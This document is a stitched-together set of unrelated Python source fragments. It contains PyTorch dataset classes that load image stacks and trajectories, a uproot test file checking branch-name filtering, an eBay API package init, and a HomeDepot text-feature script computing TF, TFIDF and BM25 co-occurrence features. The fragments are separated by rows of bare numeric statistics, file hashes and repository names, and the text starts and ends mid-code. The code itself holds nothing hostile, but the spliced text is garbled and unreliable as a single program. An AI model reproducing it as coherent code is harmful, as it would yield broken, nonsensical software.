input_img = np.empty(shape=[self.img_shape[0],self.img_shape[1],0])
info = self.info_frame.iloc[idx]
index = info['index']
traj = []
for i in range(self.nc):
img_name = info[f't{i}'].split('_')[0] + self.ext
video_idx = info['index']
img_path = os.path.join(self.root_dir, video_idx, img_name)
csv_name = glob.glob(os.path.join(self.root_dir, video_idx, '*.csv'))
original_scale = os.path.basename(csv_name[0]).split('.')[0]
original_scale = (int(original_scale.split('_')[0]), int(original_scale.split('_')[1])) # HxW
time_step = int(info[f't{i}'].split('_')[0])
this_x = float(info[f't{i}'].split('_')[1])
this_y = float(info[f't{i}'].split('_')[2])
traj.append([this_x,this_y])
image = self.togray(io.imread(img_path))
input_img = np.concatenate((input_img, image[:,:,np.newaxis]), axis=2)
white_canvas = np.zeros_like(image)
# obj_coords = self.rescale_label((this_x, this_y), original_scale)
obj_coords = (this_x, this_y)
obj_map = utils_np.np_gaudist_map(obj_coords, white_canvas, sigmas=[20,20])
input_img = np.concatenate((input_img, obj_map[:,:,np.newaxis]), axis=2)
label_name_list = [x for x in list(self.info_frame) if 'T' in x]
label_list = list(info[label_name_list].values)
label_list = [(float(x.split('_')[0]), float(x.split('_')[1])) for x in label_list]
label = dict(zip(label_name_list, label_list))
sample = {'image':input_img, 'label':label}
if self.tr:
sample = self.tr(sample)
sample['index'] = index
sample['traj'] = traj
sample['time'] = time_step
return sample
def rescale_label(self, label, original_scale): # x,y & HxW
current_scale = self.check_img_shape()
rescale = (current_scale[0]/original_scale[0] , current_scale[1]/original_scale[1])
return (label[0]*rescale[1], label[1]*rescale[0])
def togray(self, image):
if (len(image.shape)==2):
return image
elif (len(image.shape)==3) and (image.shape[2]==1):
return image[:,:,0]
else:
image = image[:,:,:3] # ignore alpha
img = image[:,:,0]/3 + image[:,:,1]/3 + image[:,:,2]/3
return img
def check_img_shape(self):
info = self.info_frame.iloc[0]
img_name = info['t0'].split('_')[0] + self.ext
video_folder = info['index']
img_path = os.path.join(self.root_dir, video_folder, img_name)
image = self.togray(io.imread(img_path))
return image.shape
class ImageStackDatasetSDDtr_ZIP(Dataset): # for trajectory
def __init__(self, zip_path, csv_path, root_dir, ext='.jpg', transform=None, T_channel=None):
'''
Args:
zip_path: Path (absolute) to the ZIP file with everything
csv_path: Path (relative) to the CSV file with dataset info.
root_dir: Directory (relative) with all image folders.
root_dir - obj_folder - obj & other
'''
super().__init__()
self.archive = zipfile.ZipFile(zip_path, 'r')
self.info_frame = pd.read_csv(self.archive.open(csv_path))
self.root_dir = root_dir
self.tr = transform
self.ext = ext
self.nc = len([x for x in list(self.info_frame) if 't' in x]) # number of image channels in half
self.img_shape = self.check_img_shape()
def __len__(self):
return len(self.info_frame)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
input_img = np.empty(shape=[self.img_shape[0],self.img_shape[1],0])
info = self.info_frame.iloc[idx]
index = info['index']
traj = []
for i in range(self.nc):
img_name = info[f't{i}'].split('_')[0] + self.ext
video_idx = info['index']
img_path = os.path.join(self.root_dir, video_idx, img_name)
csv_name = [x for x in self.archive.namelist() if ((video_idx in x)&('csv' in x))]
original_scale = os.path.basename(csv_name[0]).split('.')[0]
original_scale = (int(original_scale.split('_')[0]), int(original_scale.split('_')[1])) # HxW
time_step = int(info[f't{i}'].split('_')[0])
this_x = float(info[f't{i}'].split('_')[1])
this_y = float(info[f't{i}'].split('_')[2])
traj.append([this_x,this_y])
image = self.togray(io.imread(self.archive.open(img_path)))
input_img = np.concatenate((input_img, image[:,:,np.newaxis]), axis=2)
white_canvas = np.zeros_like(image)
# obj_coords = self.rescale_label((this_x, this_y), original_scale)
obj_coords = (this_x, this_y)
obj_map = utils_np.np_gaudist_map(obj_coords, white_canvas, sigmas=[20,20])
input_img = np.concatenate((input_img, obj_map[:,:,np.newaxis]), axis=2)
label_name_list = [x for x in list(self.info_frame) if 'T' in x]
label_list = list(info[label_name_list].values)
label_list = [(float(x.split('_')[0]), float(x.split('_')[1])) for x in label_list]
label = dict(zip(label_name_list, label_list))
sample = {'image':input_img, 'label':label}
if self.tr:
sample = self.tr(sample)
sample['index'] = index
sample['traj'] = traj
sample['time'] = time_step
return sample
def rescale_label(self, label, original_scale): # x,y & HxW
current_scale = self.check_img_shape()
rescale = (current_scale[0]/original_scale[0] , current_scale[1]/original_scale[1])
return (label[0]*rescale[1], label[1]*rescale[0])
def togray(self, image):
if (len(image.shape)==2):
return image
elif (len(image.shape)==3) and (image.shape[2]==1):
return image[:,:,0]
else:
image = image[:,:,:3] # ignore alpha
img = image[:,:,0]/3 + image[:,:,1]/3 + image[:,:,2]/3
return img
def check_img_shape(self):
info = self.info_frame.iloc[0]
img_name = info['t0'].split('_')[0] + self.ext
video_folder = info['index']
img_path = os.path.join(self.root_dir, video_folder, img_name)
image = self.togray(io.imread(self.archive.open(img_path)))
return image.shape
class MaskStackWithSegSDD(Dataset):
def __init__(self, csv_path, seg_path, channel_per_image=None, transform=None, T_channel=False):
'''
Args:
csv_path: Path to the CSV file with dataset info.
seg_path: Path to the segmentation image.
'''
super().__init__()
self.info_frame = pd.read_csv(csv_path)
self.seg_path = seg_path
self.tr = transform
self.with_T = T_channel
self.nc = len(list(self.info_frame))-5 # number of image channels in half
self.img_shape = self.check_img_shape()
def __len__(self):
return len(self.info_frame)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
input_img = np.empty(shape=[self.img_shape[0],self.img_shape[1],0])
info = self.info_frame.iloc[idx]
self.T = info['T']
index = info['index']
traj = []
img_path = self.seg_path
image = self.togray(io.imread(img_path))
input_img = np.concatenate((input_img, image[:,:,np.newaxis]), axis=2)
for i in range(self.nc):
# img_name = info[f't{i}'].split('_')[0] + self.ext
# video_idx = info['index']
time_step = int(info[f't{i}'].split('_')[0])
this_x = float(info[f't{i}'].split('_')[1])
this_y = float(info[f't{i}'].split('_')[2])
traj.append([this_x,this_y])
white_canvas = np.zeros_like(image)
obj_coords = (this_x, this_y)
obj_map = utils_np.np_gaudist_map(obj_coords, white_canvas, sigmas=[20,20])
input_img = np.concatenate((input_img, obj_map[:,:,np.newaxis]), axis=2)
if self.with_T:
T_channel = np.ones(shape=[self.img_shape[0],self.img_shape[1],1])*self.T # T_channel
input_img = np.concatenate((input_img, T_channel), axis=2) # T_channel
label = {'x':info['x'], 'y':info['y']}
sample = {'image':input_img, 'label':label}
if self.tr:
sample = self.tr(sample)
sample['index'] = index
sample['traj'] = traj
sample['time'] = time_step
return sample
def togray(self, image):
if (len(image.shape)==2):
return image
elif (len(image.shape)==3) and (image.shape[2]==1):
return image[:,:,0]
else:
image = image[:,:,:3] # ignore alpha
img = image[:,:,0]/3 + image[:,:,1]/3 + image[:,:,2]/3
return img
def check_img_shape(self):
image = self.togray(io.imread(self.seg_path))
return image.shape
| 37.417047
| 122
| 0.563845
| 3,409
| 24,583
| 3.831622
| 0.043414
| 0.026795
| 0.035829
| 0.021436
| 0.976573
| 0.976573
| 0.96953
| 0.963099
| 0.959118
| 0.952151
| 0
| 0.01632
| 0.28715
| 24,583
| 656
| 123
| 37.474085
| 0.729057
| 0.085791
| 0
| 0.945263
| 0
| 0
| 0.021149
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.082105
| false
| 0
| 0.018947
| 0.014737
| 0.212632
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a75de702e865ba217f052343cc16b6d75f5e5f6
| 7,954
|
py
|
Python
|
tests/test_0118-fix-name-fetch-again.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 133
|
2020-05-08T21:34:11.000Z
|
2022-03-07T18:12:58.000Z
|
tests/test_0118-fix-name-fetch-again.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 269
|
2020-05-13T02:42:24.000Z
|
2022-03-24T20:24:16.000Z
|
tests/test_0118-fix-name-fetch-again.py
|
eic/uproot4
|
deb8d88c2643521f372bf5005c51af8926016c7e
|
[
"BSD-3-Clause"
] | 45
|
2020-05-15T17:48:04.000Z
|
2022-03-18T19:23:07.000Z
|
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
from __future__ import absolute_import
import pytest
import skhep_testdata
import uproot
def test_keys():
with uproot.open(skhep_testdata.data_path("uproot-small-evnt-tree-fullsplit.root"))[
"tree"
] as t:
assert t.keys(filter_name="P3.Px") == ["evt/P3/P3.Px"]
assert t.keys(filter_name="/P3.Px") == []
assert t.keys(filter_name="P3/P3.Px") == []
assert t.keys(filter_name="evt/P3/P3.Px") == ["evt/P3/P3.Px"]
assert t.keys(filter_name="/evt/P3/P3.Px") == ["evt/P3/P3.Px"]
assert t["evt"].keys(filter_name="P3.Px") == ["P3/P3.Px"]
assert t["evt"].keys(filter_name="/P3.Px") == []
assert t["evt"].keys(filter_name="P3/P3.Px") == ["P3/P3.Px"]
assert t["evt"].keys(filter_name="/P3/P3.Px") == ["P3/P3.Px"]
assert t["evt"].keys(filter_name="evt/P3/P3.Px") == []
assert t["evt/P3"].keys(filter_name="P3.Px") == ["P3.Px"]
assert t["evt/P3"].keys(filter_name="/P3.Px") == ["P3.Px"]
assert t["evt/P3"].keys(filter_name="P3/P3.Px") == []
def test_numpy():
with uproot.open(skhep_testdata.data_path("uproot-small-evnt-tree-fullsplit.root"))[
"tree"
] as t:
assert list(t.arrays(filter_name="P3.Px", library="np").keys()) == ["P3.Px"]
assert list(t.arrays(filter_name="/P3.Px", library="np").keys()) == []
assert list(t.arrays(filter_name="P3/P3.Px", library="np").keys()) == []
assert list(t.arrays(filter_name="evt/P3/P3.Px", library="np").keys()) == [
"P3.Px"
]
assert list(t.arrays(filter_name="/evt/P3/P3.Px", library="np").keys()) == [
"P3.Px"
]
assert list(t["evt"].arrays(filter_name="P3.Px", library="np").keys()) == [
"P3.Px"
]
assert list(t["evt"].arrays(filter_name="/P3.Px", library="np").keys()) == []
assert list(t["evt"].arrays(filter_name="P3/P3.Px", library="np").keys()) == [
"P3.Px"
]
assert list(t["evt"].arrays(filter_name="/P3/P3.Px", library="np").keys()) == [
"P3.Px"
]
assert (
list(t["evt"].arrays(filter_name="evt/P3/P3.Px", library="np").keys()) == []
)
assert list(t["evt/P3"].arrays(filter_name="P3.Px", library="np").keys()) == [
"P3.Px"
]
assert list(t["evt/P3"].arrays(filter_name="/P3.Px", library="np").keys()) == [
"P3.Px"
]
assert (
list(t["evt/P3"].arrays(filter_name="P3/P3.Px", library="np").keys()) == []
)
assert list(t.arrays("P3.Px", library="np").keys()) == ["P3.Px"]
with pytest.raises(Exception):
t.arrays("/P3.Px", library="np")
assert list(t.arrays("evt/P3/P3.Px", library="np").keys()) == ["evt/P3/P3.Px"]
assert list(t.arrays("/evt/P3/P3.Px", library="np").keys()) == ["/evt/P3/P3.Px"]
assert list(t["evt"].arrays("P3.Px", library="np").keys()) == ["P3.Px"]
with pytest.raises(Exception):
t["evt"].arrays("/P3.Px", library="np")
assert list(t["evt"].arrays("P3/P3.Px", library="np").keys()) == ["P3/P3.Px"]
assert list(t["evt/P3"].arrays("P3.Px", library="np").keys()) == ["P3.Px"]
assert list(t["evt/P3"].arrays("/P3.Px", library="np").keys()) == ["/P3.Px"]
def test_awkward():
awkward = pytest.importorskip("awkward")
with uproot.open(skhep_testdata.data_path("uproot-small-evnt-tree-fullsplit.root"))[
"tree"
] as t:
assert t.arrays(filter_name="P3.Px", library="ak").fields == ["P3.Px"]
assert t.arrays(filter_name="/P3.Px", library="ak").fields == []
assert t.arrays(filter_name="P3/P3.Px", library="ak").fields == []
assert t.arrays(filter_name="evt/P3/P3.Px", library="ak").fields == ["P3.Px"]
assert t.arrays(filter_name="/evt/P3/P3.Px", library="ak").fields == ["P3.Px"]
assert t["evt"].arrays(filter_name="P3.Px", library="ak").fields == ["P3.Px"]
assert t["evt"].arrays(filter_name="/P3.Px", library="ak").fields == []
assert t["evt"].arrays(filter_name="P3/P3.Px", library="ak").fields == ["P3.Px"]
assert t["evt"].arrays(filter_name="/P3/P3.Px", library="ak").fields == [
"P3.Px"
]
assert t["evt"].arrays(filter_name="evt/P3/P3.Px", library="ak").fields == []
assert t["evt/P3"].arrays(filter_name="P3.Px", library="ak").fields == ["P3.Px"]
assert t["evt/P3"].arrays(filter_name="/P3.Px", library="ak").fields == [
"P3.Px"
]
assert t["evt/P3"].arrays(filter_name="P3/P3.Px", library="ak").fields == []
assert t.arrays("P3.Px", library="ak").fields == ["P3.Px"]
with pytest.raises(Exception):
t.arrays("/P3.Px", library="ak")
assert t.arrays("evt/P3/P3.Px", library="ak").fields == ["evt/P3/P3.Px"]
assert t.arrays("/evt/P3/P3.Px", library="ak").fields == ["/evt/P3/P3.Px"]
assert t["evt"].arrays("P3.Px", library="ak").fields == ["P3.Px"]
with pytest.raises(Exception):
t["evt"].arrays("/P3.Px", library="ak")
assert t["evt"].arrays("P3/P3.Px", library="ak").fields == ["P3/P3.Px"]
assert t["evt/P3"].arrays("P3.Px", library="ak").fields == ["P3.Px"]
assert t["evt/P3"].arrays("/P3.Px", library="ak").fields == ["/P3.Px"]
def test_pandas():
pandas = pytest.importorskip("pandas")
with uproot.open(skhep_testdata.data_path("uproot-small-evnt-tree-fullsplit.root"))[
"tree"
] as t:
assert t.arrays(filter_name="P3.Px", library="pd").columns.tolist() == ["P3.Px"]
assert t.arrays(filter_name="/P3.Px", library="pd").columns.tolist() == []
assert t.arrays(filter_name="P3/P3.Px", library="pd").columns.tolist() == []
assert t.arrays(filter_name="evt/P3/P3.Px", library="pd").columns.tolist() == [
"P3.Px"
]
assert t.arrays(filter_name="/evt/P3/P3.Px", library="pd").columns.tolist() == [
"P3.Px"
]
assert t["evt"].arrays(filter_name="P3.Px", library="pd").columns.tolist() == [
"P3.Px"
]
assert (
t["evt"].arrays(filter_name="/P3.Px", library="pd").columns.tolist() == []
)
assert t["evt"].arrays(
filter_name="P3/P3.Px", library="pd"
).columns.tolist() == ["P3.Px"]
assert t["evt"].arrays(
filter_name="/P3/P3.Px", library="pd"
).columns.tolist() == ["P3.Px"]
assert (
t["evt"].arrays(filter_name="evt/P3/P3.Px", library="pd").columns.tolist()
== []
)
assert t["evt/P3"].arrays(
filter_name="P3.Px", library="pd"
).columns.tolist() == ["P3.Px"]
assert t["evt/P3"].arrays(
filter_name="/P3.Px", library="pd"
).columns.tolist() == ["P3.Px"]
assert (
t["evt/P3"].arrays(filter_name="P3/P3.Px", library="pd").columns.tolist()
== []
)
assert t.arrays("P3.Px", library="pd").columns.tolist() == ["P3.Px"]
with pytest.raises(Exception):
t.arrays("/P3.Px", library="pd")
assert t.arrays("evt/P3/P3.Px", library="pd").columns.tolist() == [
"evt/P3/P3.Px"
]
assert t.arrays("/evt/P3/P3.Px", library="pd").columns.tolist() == [
"/evt/P3/P3.Px"
]
assert t["evt"].arrays("P3.Px", library="pd").columns.tolist() == ["P3.Px"]
with pytest.raises(Exception):
t["evt"].arrays("/P3.Px", library="pd")
assert t["evt"].arrays("P3/P3.Px", library="pd").columns.tolist() == [
"P3/P3.Px"
]
assert t["evt/P3"].arrays("P3.Px", library="pd").columns.tolist() == ["P3.Px"]
assert t["evt/P3"].arrays("/P3.Px", library="pd").columns.tolist() == ["/P3.Px"]
| 45.976879
| 88
| 0.537465
| 1,109
| 7,954
| 3.791704
| 0.050496
| 0.125565
| 0.172652
| 0.094174
| 0.940547
| 0.940547
| 0.939596
| 0.923424
| 0.896552
| 0.896552
| 0
| 0.032999
| 0.222781
| 7,954
| 172
| 89
| 46.244186
| 0.647202
| 0.010184
| 0
| 0.286624
| 0
| 0
| 0.186253
| 0.018803
| 0
| 0
| 0
| 0
| 0.464968
| 1
| 0.025478
| false
| 0
| 0.038217
| 0
| 0.063694
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2a82f5ecd6abb8b4fc26d4ff27da74499eedba83
| 207
|
py
|
Python
|
src/ebay_rest/api/sell_metadata/api/__init__.py
|
gbm001/ebay_rest
|
077d3478423ccd80ff35e0361821d6a11180bc54
|
[
"MIT"
] | 3
|
2021-12-12T04:28:03.000Z
|
2022-03-10T03:29:18.000Z
|
src/ebay_rest/api/sell_metadata/api/__init__.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 33
|
2021-06-16T20:44:36.000Z
|
2022-03-30T14:55:06.000Z
|
src/ebay_rest/api/sell_metadata/api/__init__.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 7
|
2021-06-03T09:30:23.000Z
|
2022-03-08T19:51:33.000Z
|
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from ...sell_metadata.api.country_api import CountryApi
from ...sell_metadata.api.marketplace_api import MarketplaceApi
| 25.875
| 63
| 0.826087
| 28
| 207
| 5.785714
| 0.571429
| 0.098765
| 0.197531
| 0.234568
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005435
| 0.111111
| 207
| 7
| 64
| 29.571429
| 0.875
| 0.198068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
aa73656b2dbfbcf460847cdf21254f2854d99343
| 14,009
|
py
|
Python
|
Code/Chenglong/feature_stat_cooc_tfidf.py
|
ChenglongChen/Kaggle_Homedepot
|
55c1033d0af3b6cf2f033fe4bcf3e1e0ffda3445
|
[
"MIT"
] | 465
|
2016-04-27T13:17:36.000Z
|
2020-05-15T11:05:13.000Z
|
Code/Chenglong/feature_stat_cooc_tfidf.py
|
CharlotteSean/Kaggle_HomeDepot
|
55c1033d0af3b6cf2f033fe4bcf3e1e0ffda3445
|
[
"MIT"
] | 1
|
2016-10-15T04:33:54.000Z
|
2016-10-15T04:33:54.000Z
|
Code/Chenglong/feature_stat_cooc_tfidf.py
|
CharlotteSean/Kaggle_HomeDepot
|
55c1033d0af3b6cf2f033fe4bcf3e1e0ffda3445
|
[
"MIT"
] | 230
|
2016-04-30T06:35:17.000Z
|
2019-12-04T08:23:22.000Z
|
# -*- coding: utf-8 -*-
"""
@author: Chenglong Chen <c.chenglong@gmail.com>
@brief: statistical cooccurrence (weighted) features
- TF & normalized TF
- TFIDF & normalized TFIDF
- Okapi BM25
"""
import sys
import string
from collections import defaultdict
import numpy as np
import pandas as pd
import config
from utils import dist_utils, ngram_utils, nlp_utils, np_utils, pkl_utils
from utils import logging_utils, time_utils
from feature_base import BaseEstimator, PairwiseFeatureWrapper
# tune the token pattern to get a better correlation with y_train
# token_pattern = r"(?u)\b\w\w+\b"
# token_pattern = r"\w{1,}"
# token_pattern = r"\w+"
# token_pattern = r"[\w']+"
token_pattern = " " # just split the text into tokens
# ----------------------------- TF ------------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocTF_Ngram(BaseEstimator):
"""Single aggregation features"""
def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
str_match_threshold=config.STR_MATCH_THRESHOLD):
super().__init__(obs_corpus, target_corpus, aggregation_mode)
self.ngram = ngram
self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
self.str_match_threshold = str_match_threshold
def __name__(self):
if isinstance(self.aggregation_mode, str):
feat_name = "StatCoocTF_%s_%s"%(
self.ngram_str, string.capwords(self.aggregation_mode))
elif isinstance(self.aggregation_mode, list):
feat_name = ["StatCoocTF_%s_%s"%(
self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
return feat_name
def transform_one(self, obs, target, id):
obs_tokens = nlp_utils._tokenize(obs, token_pattern)
target_tokens = nlp_utils._tokenize(target, token_pattern)
obs_ngrams = ngram_utils._ngrams(obs_tokens, self.ngram)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
val_list = []
for w1 in obs_ngrams:
s = 0.
for w2 in target_ngrams:
if dist_utils._is_str_match(w1, w2, self.str_match_threshold):
s += 1.
val_list.append(s)
if len(val_list) == 0:
val_list = [config.MISSING_VALUE_NUMERIC]
return val_list
# ----------------------------- Normalized TF ------------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocNormTF_Ngram(BaseEstimator):
"""Single aggregation features"""
def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
str_match_threshold=config.STR_MATCH_THRESHOLD):
super().__init__(obs_corpus, target_corpus, aggregation_mode)
self.ngram = ngram
self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
self.str_match_threshold = str_match_threshold
def __name__(self):
if isinstance(self.aggregation_mode, str):
feat_name = "StatCoocNormTF_%s_%s"%(
self.ngram_str, string.capwords(self.aggregation_mode))
elif isinstance(self.aggregation_mode, list):
feat_name = ["StatCoocNormTF_%s_%s"%(
self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
return feat_name
def transform_one(self, obs, target, id):
obs_tokens = nlp_utils._tokenize(obs, token_pattern)
target_tokens = nlp_utils._tokenize(target, token_pattern)
obs_ngrams = ngram_utils._ngrams(obs_tokens, self.ngram)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
val_list = []
for w1 in obs_ngrams:
s = 0.
for w2 in target_ngrams:
if dist_utils._is_str_match(w1, w2, self.str_match_threshold):
s += 1.
val_list.append(np_utils._try_divide(s, len(target_ngrams)))
if len(val_list) == 0:
val_list = [config.MISSING_VALUE_NUMERIC]
return val_list
# ------------------------------ TFIDF -----------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocTFIDF_Ngram(BaseEstimator):
"""Single aggregation features"""
def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
str_match_threshold=config.STR_MATCH_THRESHOLD):
super().__init__(obs_corpus, target_corpus, aggregation_mode)
self.ngram = ngram
self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
self.str_match_threshold = str_match_threshold
self.df_dict = self._get_df_dict()
def __name__(self):
if isinstance(self.aggregation_mode, str):
feat_name = "StatCoocTFIDF_%s_%s"%(
self.ngram_str, string.capwords(self.aggregation_mode))
elif isinstance(self.aggregation_mode, list):
feat_name = ["StatCoocTFIDF_%s_%s"%(
self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
return feat_name
def _get_df_dict(self):
# smoothing
d = defaultdict(lambda : 1)
for target in self.target_corpus:
target_tokens = nlp_utils._tokenize(target, token_pattern)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
for w in set(target_ngrams):
d[w] += 1
return d
def _get_idf(self, word):
return np.log((self.N - self.df_dict[word] + 0.5)/(self.df_dict[word] + 0.5))
def transform_one(self, obs, target, id):
obs_tokens = nlp_utils._tokenize(obs, token_pattern)
target_tokens = nlp_utils._tokenize(target, token_pattern)
obs_ngrams = ngram_utils._ngrams(obs_tokens, self.ngram)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
val_list = []
for w1 in obs_ngrams:
s = 0.
for w2 in target_ngrams:
if dist_utils._is_str_match(w1, w2, self.str_match_threshold):
s += 1.
val_list.append(s * self._get_idf(w1))
if len(val_list) == 0:
val_list = [config.MISSING_VALUE_NUMERIC]
return val_list
# ------------------------------ Normalized TFIDF -----------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocNormTFIDF_Ngram(BaseEstimator):
"""Single aggregation features"""
def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
str_match_threshold=config.STR_MATCH_THRESHOLD):
super().__init__(obs_corpus, target_corpus, aggregation_mode)
self.ngram = ngram
self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
self.str_match_threshold = str_match_threshold
self.df_dict = self._get_df_dict()
def __name__(self):
if isinstance(self.aggregation_mode, str):
feat_name = "StatCoocNormTFIDF_%s_%s"%(
self.ngram_str, string.capwords(self.aggregation_mode))
elif isinstance(self.aggregation_mode, list):
feat_name = ["StatCoocNormTFIDF_%s_%s"%(
self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
return feat_name
def _get_df_dict(self):
# smoothing
d = defaultdict(lambda : 1)
for target in self.target_corpus:
target_tokens = nlp_utils._tokenize(target, token_pattern)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
for w in set(target_ngrams):
d[w] += 1
return d
def _get_idf(self, word):
return np.log((self.N - self.df_dict[word] + 0.5)/(self.df_dict[word] + 0.5))
def transform_one(self, obs, target, id):
obs_tokens = nlp_utils._tokenize(obs, token_pattern)
target_tokens = nlp_utils._tokenize(target, token_pattern)
obs_ngrams = ngram_utils._ngrams(obs_tokens, self.ngram)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
val_list = []
for w1 in obs_ngrams:
s = 0.
for w2 in target_ngrams:
if dist_utils._is_str_match(w1, w2, self.str_match_threshold):
s += 1.
val_list.append(np_utils._try_divide(s, len(target_ngrams)) * self._get_idf(w1))
if len(val_list) == 0:
val_list = [config.MISSING_VALUE_NUMERIC]
return val_list
# ------------------------ BM25 ---------------------------------------------
# StatCooc stands for StatisticalCooccurrence
class StatCoocBM25_Ngram(BaseEstimator):
"""Single aggregation features"""
def __init__(self, obs_corpus, target_corpus, ngram, aggregation_mode="",
str_match_threshold=config.STR_MATCH_THRESHOLD, k1=config.BM25_K1, b=config.BM25_B):
super().__init__(obs_corpus, target_corpus, aggregation_mode)
self.k1 = k1
self.b = b
self.ngram = ngram
self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
self.str_match_threshold = str_match_threshold
self.df_dict = self._get_df_dict()
self.avg_ngram_doc_len = self._get_avg_ngram_doc_len()
def __name__(self):
if isinstance(self.aggregation_mode, str):
feat_name = "StatCoocBM25_%s_%s"%(
self.ngram_str, string.capwords(self.aggregation_mode))
elif isinstance(self.aggregation_mode, list):
feat_name = ["StatCoocBM25_%s_%s"%(
self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
return feat_name
def _get_df_dict(self):
# smoothing
d = defaultdict(lambda : 1)
for target in self.target_corpus:
target_tokens = nlp_utils._tokenize(target, token_pattern)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
for w in set(target_ngrams):
d[w] += 1
return d
def _get_idf(self, word):
return np.log((self.N - self.df_dict[word] + 0.5)/(self.df_dict[word] + 0.5))
def _get_avg_ngram_doc_len(self):
lst = []
for target in self.target_corpus:
target_tokens = nlp_utils._tokenize(target, token_pattern)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
lst.append(len(target_ngrams))
return np.mean(lst)
def transform_one(self, obs, target, id):
obs_tokens = nlp_utils._tokenize(obs, token_pattern)
target_tokens = nlp_utils._tokenize(target, token_pattern)
obs_ngrams = ngram_utils._ngrams(obs_tokens, self.ngram)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
K = self.k1 * (1 - self.b + self.b * np_utils._try_divide(len(target_ngrams), self.avg_ngram_doc_len))
val_list = []
for w1 in obs_ngrams:
s = 0.
for w2 in target_ngrams:
if dist_utils._is_str_match(w1, w2, self.str_match_threshold):
s += 1.
bm25 = s * self._get_idf(w1) * np_utils._try_divide(1 + self.k1, s + K)
val_list.append(bm25)
if len(val_list) == 0:
val_list = [config.MISSING_VALUE_NUMERIC]
return val_list
# ---------------------------- Main --------------------------------------
def main(which):
logname = "generate_feature_stat_cooc_tfidf_%s_%s.log"%(which, time_utils._timestamp())
logger = logging_utils._get_logger(config.LOG_DIR, logname)
dfAll = pkl_utils._load(config.ALL_DATA_LEMMATIZED_STEMMED)
generators = []
if which == "tf":
generators.append( StatCoocTF_Ngram )
elif which == "norm_tf":
generators.append( StatCoocNormTF_Ngram )
elif which == "tfidf":
generators.append( StatCoocTFIDF_Ngram )
elif which == "norm_tfidf":
generators.append( StatCoocNormTFIDF_Ngram )
elif which == "bm25":
generators.append( StatCoocBM25_Ngram )
obs_fields_list = []
target_fields_list = []
## query in document
obs_fields_list.append( ["search_term", "search_term_alt", "search_term_auto_corrected"][:1] )
target_fields_list.append( ["product_title", "product_title_product_name", "product_description", "product_attribute", "product_brand", "product_color"] )
## document in query
obs_fields_list.append( ["product_title", "product_title_product_name", "product_description", "product_attribute", "product_brand", "product_color"] )
target_fields_list.append( ["search_term", "search_term_alt", "search_term_auto_corrected"][:1] )
ngrams = [1,2,3,12,123][:3]
aggregation_mode = ["mean", "std", "max", "min", "median"]
for obs_fields, target_fields in zip(obs_fields_list, target_fields_list):
for generator in generators:
for ngram in ngrams:
param_list = [ngram, aggregation_mode]
pf = PairwiseFeatureWrapper(generator, dfAll, obs_fields, target_fields, param_list, config.FEAT_DIR, logger)
pf.go()
obs_fields_list = []
target_fields_list = []
## query in document
obs_fields_list.append( ["search_term_product_name"] )
target_fields_list.append( ["product_title_product_name"] )
ngrams = [1,2]
aggregation_mode = ["mean", "std", "max", "min", "median"]
for obs_fields, target_fields in zip(obs_fields_list, target_fields_list):
for generator in generators:
for ngram in ngrams:
